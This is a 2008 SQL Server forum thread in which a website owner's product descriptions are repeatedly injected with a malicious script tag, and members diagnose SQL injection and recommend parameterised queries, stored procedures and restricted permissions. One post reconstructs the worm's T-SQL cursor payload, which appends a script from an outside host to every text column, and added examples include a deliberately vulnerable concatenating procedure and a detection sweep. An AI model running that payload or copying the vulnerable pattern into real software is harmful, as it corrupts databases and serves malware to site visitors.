Rob K
Starting Member
United Kingdom
9 Posts
Posted - 05/13/2008 : 07:52:02

I have an ASP website that uses SQL 2005. For the last 2 nights someone has hacked the DB and added a URL with a script to the end of my product descriptions; the script is located on another server which is infected with viruses. For example, a field should read 'Clothing'; when it gets hacked it reads 'Clothing <Script... blah blah here>'. I have restored the DB each time but I cannot find how they are doing this. The Windows Firewall is blocking any external SQL connections, so I am guessing there is something local that is doing this. Any ideas where to look for clues?
Thanks.
harsh_athalye
Flowing Fount of Yak Knowledge
India
5509 Posts
Posted - 05/13/2008 : 07:53:29

SQL Injection will be my first guess.
Harsh Athalye India. "The IMPOSSIBLE is often UNTRIED"
Rob K
Starting Member
United Kingdom
9 Posts
Posted - 05/13/2008 : 08:05:49

quote: Originally posted by harsh_athalye
SQL Injection will be my first guess.
Harsh Athalye India. "The IMPOSSIBLE is often UNTRIED"

OK, not being a SQL expert, can you help me out here? Where would I look to find out if that is it?
harsh_athalye
Flowing Fount of Yak Knowledge
India
5509 Posts
Rob K
Starting Member
United Kingdom
9 Posts
Posted - 05/13/2008 : 08:17:04

OK, thanks v much for that.
Rob K
Starting Member
United Kingdom
9 Posts
Posted - 05/13/2008 : 09:57:30

If it is a SQL injection, would that be in a log somewhere?
pootle_flump
Flowing Fount of Yak Knowledge
United Kingdom
1064 Posts
Posted - 05/13/2008 : 11:51:33

Not in any form that you can read as it is. The problem with SQL Injection is that by definition it is not recognised by SQL Server as malicious. If you are concatenating user input into SQL statements for execution then you can be pretty confident this has been done by SQL Injection.
nheidorn
Starting Member
USA
28 Posts
Rob K
Starting Member
United Kingdom
9 Posts
Posted - 05/13/2008 : 12:38:40

Great, I have blocked the IPs mentioned on that link.
GilaMonster
Flowing Fount of Yak Knowledge
South Africa
4507 Posts
Posted - 05/14/2008 : 02:36:08

If you want to protect yourself against SQL injection, use only stored procedures to access the DB. Use parameterised calls in your ASP code. Don't concatenate SQL statements and execute them. Restrict your database user to have only execute permissions on the stored procs and nothing else.
-- Gail Shaw
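An added T-SQL example (not code from the thread) of the layering Gail describes: the concatenating shape beside a typed-parameter procedure, parameterised dynamic SQL via sp_executesql where dynamic SQL is unavoidable, and an execute-only database user. The Products table, the WebApp login and the usp_* procedure names are constructed for illustration.

```sql
-- Added example (not the thread's code) of the layering Gail describes.
-- Products, WebApp and the usp_* names are constructed for illustration.

-- 1. The shape that lets the worm in: input concatenated into SQL text and
--    executed, so a crafted value is run as additional statements.
CREATE PROCEDURE dbo.usp_GetProduct_Unsafe @ProductID varchar(50)
AS
    EXEC ('SELECT ProductID, Description FROM dbo.Products WHERE ProductID = '
          + @ProductID);                       -- vulnerable: do not copy
GO

-- 2. Typed parameter: the value is an int, never SQL text.
CREATE PROCEDURE dbo.usp_GetProduct @ProductID int
AS
    SET NOCOUNT ON;
    SELECT ProductID, Description FROM dbo.Products WHERE ProductID = @ProductID;
GO

-- 3. When dynamic SQL is really needed, keep the statement text fixed and
--    pass every value through sp_executesql. Dynamic SQL runs with the
--    caller's own permissions (ownership chaining does not cover it), so
--    EXECUTE AS OWNER lets the proc read the table on the caller's behalf.
CREATE PROCEDURE dbo.usp_SearchProducts @Term nvarchar(100)
WITH EXECUTE AS OWNER
AS
    SET NOCOUNT ON;
    DECLARE @Sql nvarchar(max), @Pattern nvarchar(102);
    SET @Pattern = N'%' + @Term + N'%';
    SET @Sql = N'SELECT ProductID, Description FROM dbo.Products '
             + N'WHERE Description LIKE @Pattern';
    EXEC sp_executesql @Sql, N'@Pattern nvarchar(102)', @Pattern = @Pattern;
GO

-- 4. Least privilege: the site's login may only EXECUTE the safe procedures.
--    It holds no SELECT or UPDATE on tables, so the worm's
--    "update [table] set [column] = ..." is refused even if it gets through.
CREATE LOGIN WebApp WITH PASSWORD = 'replace-with-a-strong-password';
CREATE USER WebApp FOR LOGIN WebApp;
GRANT EXECUTE ON dbo.usp_GetProduct     TO WebApp;
GRANT EXECUTE ON dbo.usp_SearchProducts TO WebApp;
GO
```

On the ASP side the procedures are invoked through an ADODB.Command with adCmdStoredProc and typed Parameters, never by building the EXEC string from Request values.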
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts
Posted - 05/14/2008 : 02:56:00

Where is the post Jeff made where he dissected the binary string into T-SQL?
E 12°55'05.25" N 56°04'39.16"
GilaMonster
Flowing Fount of Yak Knowledge
South Africa
4507 Posts
Posted - 05/14/2008 : 03:58:44

quote: Originally posted by Peso
Where is the post Jeff made where he dissected the binary string into T-SQL?

If you find it, I'd very much like to see it.
-- Gail Shaw
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts
Posted - 05/14/2008 : 04:16:05

I remember it was something about

SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE Type IN ('VARCHAR', 'CHAR', 'TEXT')

E 12°55'05.25" N 56°04'39.16"
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts
Posted - 05/14/2008 : 04:23:40

The cleartext code looked similar to this:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
    exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

E 12°55'05.25" N 56°04'39.16"
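An added defender-side T-SQL sweep (not code from the thread): it walks the same column set the cursor script above targets, extended from the char/varchar/text list SwePeso recalls to the Unicode types the script also hits, and reports which columns currently hold an injected <script> tag. It only reads, so the output can be reviewed before any cleanup or restore; the @Needle value and the #Hits table are constructed for this example.

```sql
-- Added example (not from the thread): list every character column that
-- currently contains an injected <script ...> tag. Read-only; review the
-- result before cleaning up. @Needle is a constructed marker value.
DECLARE @Needle nvarchar(100);
SET @Needle = N'%<script%';           -- left behind by the injected UPDATE

IF OBJECT_ID('tempdb..#Hits') IS NOT NULL DROP TABLE #Hits;
CREATE TABLE #Hits (TableName sysname, ColumnName sysname, HitCount int);

DECLARE @Schema sysname, @Table sysname, @Column sysname, @Sql nvarchar(max);

-- Same column population the worm's cursor enumerates via syscolumns
-- (text=35, ntext=99, varchar=167, nvarchar=231), plus char/nchar.
DECLARE ColCursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS AS c
    JOIN INFORMATION_SCHEMA.TABLES AS t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'varchar', 'text', 'nchar', 'nvarchar', 'ntext');

OPEN ColCursor;
FETCH NEXT FROM ColCursor INTO @Schema, @Table, @Column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- QUOTENAME() keeps unusual identifiers from breaking the dynamic SQL;
    -- the search value itself travels as a parameter, not as concatenated text.
    SET @Sql = N'INSERT #Hits SELECT @t, @c, COUNT(*) FROM '
             + QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table)
             + N' WHERE ' + QUOTENAME(@Column) + N' LIKE @n HAVING COUNT(*) > 0';
    EXEC sp_executesql @Sql,
         N'@t sysname, @c sysname, @n nvarchar(100)',
         @t = @Table, @c = @Column, @n = @Needle;
    FETCH NEXT FROM ColCursor INTO @Schema, @Table, @Column;
END
CLOSE ColCursor;
DEALLOCATE ColCursor;

SELECT TableName, ColumnName, HitCount FROM #Hits ORDER BY HitCount DESC;
```

A non-empty result after a restore means the injection path is still open; comparing the hit list between runs shows whether the re-infection is limited to the columns the front-end writes through concatenated SQL.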
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts
GilaMonster
Flowing Fount of Yak Knowledge
South Africa
4507 Posts
Posted - 05/14/2008 : 05:00:52

Hmm. SQL Injection and XSS all in one. Interesting.
Not close to as damaging as it could have been.
-- Gail Shaw
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts
Posted - 05/14/2008 : 05:07:13

I agree. The attack could have encrypted all columns!
I hope this teaches all newbies, noobs and beginners to NEVER EVER concatenate strings to send to the database. Always use parametrized queries as a first line of defence.
E 12°55'05.25" N 56°04'39.16"
Byapti
Starting Member
1 Posts
SwePeso
Patron Saint of Lost Yaks
Sweden
29138 Posts
Posted - 05/14/2008 : 06:03:24

Is it really "a vulnerability at database layer"? The database is just performing what the front-end application tells it to.
E 12°55'05.25" N 56°04'39.16"
GilaMonster
Flowing Fount of Yak Knowledge
South Africa
4507 Posts
Posted - 05/14/2008 : 07:47:36

quote: Originally posted by Peso
I hope this teaches all newbies, noobs and beginners to NEVER EVER concatenate strings to send to the database. Always use parametrized queries as a first line of defence.

Considering all the posts here and on Central in the last couple of weeks, I somehow doubt it.
-- Gail Shaw
Edited by - GilaMonster on 05/14/2008 08:04:28
harsh_athalye
Flowing Fount of Yak Knowledge
India
5509 Posts
Posted - 05/14/2008 : 07:59:37

Only experience can teach them then!
Harsh Athalye India. "The IMPOSSIBLE is often UNTRIED"